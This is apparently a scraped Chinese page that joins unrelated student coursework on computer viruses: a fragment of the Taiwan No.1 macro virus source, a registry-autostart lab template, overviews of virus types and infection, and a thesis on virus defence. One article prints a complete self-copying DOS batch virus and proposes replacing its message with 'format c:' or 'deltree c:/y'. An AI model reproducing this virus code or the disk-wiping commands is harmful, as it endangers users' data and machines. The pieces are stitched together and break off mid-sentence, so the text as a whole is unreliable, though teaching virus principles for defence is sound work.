四.实验步骤及截图 台湾1号病毒代码 Taiwan No.1 病毒原始码 Dim Shared nm(4) Sub MAIN DisableInput 1 If Day(Now()) = 13 Then try: On Error Goto 0 On Error Goto try test = - 1 con = 1 tog$ = "" i = 0 While test = - 1 For i = 0 To 4 nm(i) = Int(Rnd() * 10000) con = (con * nm(i)) If i = 4 Then tog$ = tog$ + Str$(nm(4)) + " =?" Goto beg End If tog$ = tog$ + Str$(nm(i)) + " *" Next i rem 随机选出四个千位数, 以便等一下的游戏

计算机病毒实验报告

计算机病毒实验报告 说明 1.本课程作业报告是《计算机病毒与反病毒》课程成绩评定的重要依据,须认真完成。 2.报告内容严禁出现雷同,每位同学须独立完成。若发现抄袭,抄袭者和被抄袭者本课程的成绩均以零分计。 3.要排版,格式应规范,截图一律采用JPG格式(非BMP格式)。为避免抄袭,用图像编辑软件在截图右下角“嵌入”自己的学号或姓名。实验报告的格式是否规范、截图是否嵌入了自己的学号或姓名,是评价报告质量的考量因素。 4.说明文字与实验截图相配合,若只有说明文字,或只有截图,则成绩为不及格。 5.只提交报告电子版。在规定的日期内,通过电子邮件发送到[emailprotected],若三天之内没有收到内容为“已收到”的回复确认Email,请再次发送或电话联系任课老师。 6.为了便于归档,实验报告Word文档的命名方式是“学号姓名-计算机病毒实验报告.doc”,如“20xx12345张三-计算机病毒课程报告.doc”。 注意:提交报告截止日期以QQ群通知时间为准(一般在考试周下周周三),若因没有及时提交实验报告,导致课程成绩为“缺考”的,责任自负。

实验一程序的自动启动 一、实验目的 (1)验证利用注册表特殊键值自动启动程序的方法; (2)检查和熟悉杀毒软件各组成部分的自动启动方法。 二、实验内容与要求 (1)在注册表自动加载程序主键中,添加加载目标程序键值(自己指派任意程序),重启操作系统,检查是否能自动成功加载目标程序。罗列5或5个以上能自动启动目标程序的键值,并用其中某一个启动自己指派的程序。 (2)检查/分析你所使用的计算机中杀毒软件系统托盘程序、底层驱动程序等组成部分的自动启动方式。 三、实验环境与工具 操作系统:Windows XP/Windows Vista/Windows 7 工具软件:RegEdit.exe,AutoRuns,或其他注册表工具软件;杀毒软件 四、实验步骤与实验结果 一)按启动文件夹的方法 1、“启动”文件夹是最常见的自启动文件夹。可以打开“开始”菜单—>“所有程序”,在所有程序里面可以找到“启动”文件夹找到“启动”文件夹的位置,在其中加入WPS的word 的快捷方式,就可以在电脑开机时自启动word了.在AutoRuns中可以看到如下图中的结果,WPS文字的快捷方式在自启动项中。

计算机病毒的种类及原理

计算机病毒的种类及原理 从计算机病毒的基本类型来分,计算机病毒可以分为系统引导型病毒、可执行文件型病毒、宏病毒、混合型病毒、特洛伊木马型病毒和Internet语言病毒等等。 ●系统引导型病毒 系统引导型病毒在系统启动时,先于正常系统的引导将病毒程序自身装入到操作系统中,在完成病毒自身程序的安装后,该病毒程序成为系统的一个驻留内存的程序,然后再将系统的控制权转给真正的系统引导程序,完成系统的安装。表面上看起来计算机系统能够启动并正常运行,但此时,由于有计算机病毒程序驻留在内存,计算机系统已在病毒程序的控制之下了。 系统引导型病毒主要是感染软盘的引导扇区和硬盘的主引导扇区或DOS引导扇区,其传染方式主要是通过用被病毒感染的软盘启动计算机而传染的。只要用这些有系统引导型病毒的软件启动计算机,不管有没有引导成功,系统引导型病毒都将自动装入内存。而在这些由系统引导型病毒控制的系统下,将感染所有进行读、写操作的软盘和硬盘的引导扇区或主引导扇区,一旦硬盘感染了系统引导型病毒,那将感染所有在该系统中使用的软盘。这样,通过软盘作为传染的媒介,病毒就会广泛传播。 ●可执行文件型病毒 可执行文件型病毒依附在可执行文件或覆盖文件中,当病毒程序感染一个可执行文件时,病毒修改原文件的一些参数,并将病毒自身程序添加到原文件中。在被感染病毒的文件被执行时,由于病毒修改了原文件的一些参数,所以首先执行病毒程序的一段代码,这段病毒程序的代码主要功能是将病毒程序驻留在内存,以取得系统的控制权,从而可以完成病毒的复制和一些破坏操作,然后再执行原文件的程序代码,实现原来的程序功能,以迷惑用户。 可执行文件型病毒主要感染系统可执行文件(如DOS或WINDOWS系统的COM或EXE文件)或覆盖文件(如OVL文件)中,极少感染数据文件。其传染方式是当感染了病毒的可执行文件被执行或者当系统有任何读、写操作时,向外进行传播病毒。此时,病毒程序首先将要被感染的文件读入内存,判断其特定位置上是否有该病毒程序的标记,如果已经感染了就不再重复感染,如果没有感染,则将病毒程序写到该文件中。在完成病毒传染后,才去执行本来系统申请的功能。 ●宏病毒 宏病毒是利用宏语言编制的病毒,宏病毒充分利用宏命令的强大系统调用功能,实现某些涉及系统底层操作的破坏。宏病毒仅感染Windows系统下用Word、Excel、Access、PowerPoint等办公自动化程序编制的文档以及Outlook express邮件等,不会感染给可执行文件。 宏病毒是按以下方法进行传播的: (1)当打开一个带宏病毒的文件模板后,该模板可以通过执行其中的宏程序将自身所携带的病毒宏程序拷贝到办公自动化系统的通用模板中; (2)若使用带病毒的模板对文件进行操作时,可以将该文档文件重新存盘为带病毒模板文件,即由原来不带宏程序的纯文本文件转换为带宏病毒的模板 文件。 以上两步循环就构成了宏病毒的传染机制。 ●混合型病毒 混合型病毒是以上几种的混合。混合型病毒的目的是为了综合利用以上3种病毒的传染渠道进行破坏。混合型病毒不仅传染可执行文件而且还传染硬盘主引导扇区,被这种病毒传

计算机病毒的原理与防范研究(最新版)

石家庄科技信息职业学院 顶岗实习岗位技术工作论文 计算机病毒的原理与防范研究 学号: 121403116 姓名: 孟靖凯 专业: 计算机网络技术 年级: 12级 企业指导老师: 李树新 校内指导老师: 张青云 二〇一五年三月

题目计算机病毒的原理与防范研究 企业指导教师 评语该生实习期间,态度端正,学习踏实,工作认真,注重理论和实践相结合,将大学所学的课堂知识能有效地运用于实际工作中,能吃苦耐劳,工 作责任心强,注重团队合作,善于取长补短,虚心好学,具有一定的开拓和 创新精神,接受新事物较快,涉猎面较宽,在某领域不断地探索,有自己的 思路和设想。 指导教师(签章) 校内指导教师 评语论文逻辑结构合理,写作态度端正,选题符合专业方向。能够运用所学知识分析问题并给出解决对策。同时积极地将理论知识与实践相联系。

指导教师张青云(签章) 成绩 2015年4月1 日

摘要 计算机的日益普及,网络技术也在飞快的发展,计算机病毒的传播也越来越快,范围越来越广,病毒带来的危害越越来越严重,如何才能有效的防御住病毒攻击,早发现,早清除,减少损失,成了用户最为关切的问题。 计算机病毒其实是一种人为编写的计算机运行代码或者说是计算机运行程序,某些人在掌握了一定的计算机知识,计算机硬件软件知识的基础上编写出来,通常是用于攻击其他计算机软硬件,照成故障或信息泄露。在一定意义上来说,计算机病毒就是指可以破坏计算机的数据,影响计算机正常使用,可以造成计算机损坏的计算机程序。 关键词:病毒;危害;传播;防范

计算机病毒的原理与防范研究 1. 计算机病毒的概念及危害 1.1 计算机病毒的概念 计算机病毒在《中华人民共和国计算机信息系统安全保护条例》中说明:病毒指“编程者在计算机命令中插入的破坏计算机运行或者损害数据完整,影响计算机使用并且能够自我复制的一组计算机指令和程序代码”。 随着信息革命的不断发展,网络已成为我们生活中,特别是年轻一代所喜爱,,我们的互联网技术和现代化通讯技术的日益发展,我们的运用越来越广泛,也越来越普及,使得信息的流传在人们的社会中越来越重要,成为了我们生活中不能或缺的一部分,也因为互联网具有开放,互联,时效,虚拟,等特性。可以传播各种观点思想,也因此成了大学生更喜欢的一种交流方式,因为网络,学生们的世界观和价值观,行为方式都多少受到了影响,也正因为事物总是具有两面性,当我们畅游在网络的世界里时,危险也随着诞生,网络给我们的生活带来方便快捷的同时,也同样会伤害我们,我们电脑随时都有可能会被别人控制,我们银行卡的信息也有可能会被盗,这些都“归功”于“计算机病毒”,看看下面的内容,让大家充分了解计算机病毒,也让大家学习一下怎么预防。 1.2 计算机病毒的危害 在最近几年,计算机病毒进行盗窃机密,破坏系统,修改注册表,修改系统指令,在人们生活和工作中造成巨大的影响,还发生过几次大规模的病毒爆发,我国网络的发展和应用已经受到了计算机病毒日益崛起的巨大威胁,基本上,每个计算机用户都曾被计算机病毒入侵感染过,自从计算机病毒出现的那天起,它就一直是扮演着丑陋的角色。在1999年,一个“梅丽莎”的病毒爆发了,它在短短一天入侵超过6000台电脑,达到8000万美元亏损。最终,病毒的始作俑者也受到了法律的制裁。在2000年5月一个可以能够经过Outlook传布的编程命令,就这样“爱虫”病毒出现了,病毒传播速度快,范围广,可谓迄今未知,在全球传播造成了损失100多亿美元,影响力涉及金融,技术公司,媒体,学校等多种大型机构。2001年诞生两种破坏力极度厉害的病毒,即蠕虫病毒Nimda和Code Red。其中最强的是Nimda病毒,它波及范围达到了世界每一个角落,而用时只有半个小时。2003年对于计算机界是非常惨痛的一年,8月份的“冲击波”病毒爆发影响力是非常大的,“冲击波”病毒将整个网络都给入侵了,照成了巨大的损失,损失预计达到几十亿美元,并导致上百万台计算机被

计算机病毒工作原理

计算机病毒工作原理 条件成熟病毒就开始自我复制到传染对象中,进行各种破坏活动等。 病毒的传染是病毒性能的一个重要标志。 在传染环节中,病毒复制一个自身副本到传染对象中去。 计算机病毒二、计算机病毒的简单介绍:计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。 计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。 计算机病毒的生命周期:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。 计算机病毒是一个程序,一段可执行码。 就像生物病毒一样,具有自我繁殖、互相传染以及激活再生等生物病毒特征。 计算机病毒有独特的复制能力,它们能够快速蔓延,又常常难以根除。 它们能把自身附着在各种类型的文件上,当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。 举一个“hello word例子。 下面是一个简单的DOS批处理病毒源程序autoexec.bat(假设从A

盘启动):程序语句程序注解IF exist c:\\autoexec.bat goto Virus REM 首先检查时机Goto No_Virus REM 若时机不成熟则潜伏:Virus REM 时机成熟时(子程序)c: REM 转到C盘ren autoexec.bat auto.bat REM 将正常文件改名,准备冒名顶替copy a:\\autoexec.bat c:\\ REM 自我复制,开始繁殖echo Hello Word! REM 病毒发作,表现症状:No_Virus REM 正常程序入口a: REM 转回A盘/auto REM 执行正常程序pause REM 暂停等待按任意键继续这个程序非常简单,但却包含了计算机病毒的典型结构,引导部分、传染部分、激发部分等五脏俱全。 其触发机制是:C盘存在autoexec.bat文件,当我们用带有此病毒的启动软盘启动微机时若C盘也有autoexec.bat文件,则病毒将C盘原autoexec.bat文件改名为auto.bat,把自身复制到C盘并显示“Hello Word!。 如果按以前的分类,它可以算是个良性病毒(但再良的病毒都要占用系统资源)。 当然它还无加密和没有严重破坏系统的行为,但要是把echo Hello Word!改为format c:或deltree c:/y看了“ 计算机病毒工作原理文章的还看了:1.计算机病毒的工作原理2.计算机病毒工作原理是什么3.计算机病毒原理介绍4.计算机病毒入侵原理是什么5.计算机病毒本质是什么6.计算机病毒产生原因是什么7.计算机病毒破坏对象是什么

计算机病毒实验报告

计算机病毒原理实验报告专业:信息安全 班级:0903班 姓名: 学号: 时间:2012年1月3日 计算机病毒的传染机制: 1.计算机病毒的传染方式 所谓传染是指计算机病毒由一个载体传播到另一个载体,由一个系统进入另一个系统的过程。这种载体一般为磁盘或磁带,它是计算机病毒赖以生存和进行传染的媒介。但是,只有载体还不足以使病毒得到传播。促成病毒的传染还有一个先决条件,可分为两种情况,或者叫做两种方式。 其中一种情况是,用户在进行拷贝磁盘或文件时,把一个病毒由一个载体复制到另一个载体上。或者是通过网络上的信息传递,把一个病毒程序从一方传递到另一方。这种传染方式叫做计算机病毒的被动传染。 另外一种情况是,计算机病毒是以计算机系统的运行以及病毒程序处于激活状态为先决条件。在病毒处于激活的状态下,只要传染条件满足,病毒程序能主动地把病毒自身传染给另一个载体或另一个系统。这种传染方式叫做计算机病毒的主动传染。 2.计算机病毒的传染过程 对于病毒的被动传染而言,其传染过程是随着拷贝磁盘或文件工作的进行而进行的,而对于计算机病毒的主动传染而言,其传染过程是这样的:在系统运行时,病毒通过病毒载体即系统的外存储器进入系统的内存储器,常驻内存,并在系统内存中监视系统的运行。在病毒引导模块将病毒传染模块驻留内存的过程中,通常还要修改系统中断向量入口地址(例如INT 13H或INT 21H),使该中断向量指向病毒程序传染模块。这样,一旦系统执行磁盘读写操作或系统功能调用,病毒传染模块就被激活,传染模块在判断传染条件满足的条件下,利用系统INT 13H读写磁盘中断把病毒自身传染给被读写的磁盘或被加载的程序,也就是实施病毒的传染,然后再转移到原中断服务程序执行原有的操作。 计算机病毒的传染方式基本可分为两大类,一是立即传染,即病毒在被执行到的瞬间,抢在宿主程序开始执行前,立即感染磁盘上的其他程序,然后再执行宿主程序;二是驻留内存并伺机传染,内存中的病毒检查当前系统环境,在执行一个程序或D1R等操作时传染磁盘上的程序,驻留在系统内存中的病毒程序在宿主程序运行结束后,仍可活动,直至关闭计算机。 3.系统型病毒传染机理

相关文档
最新文档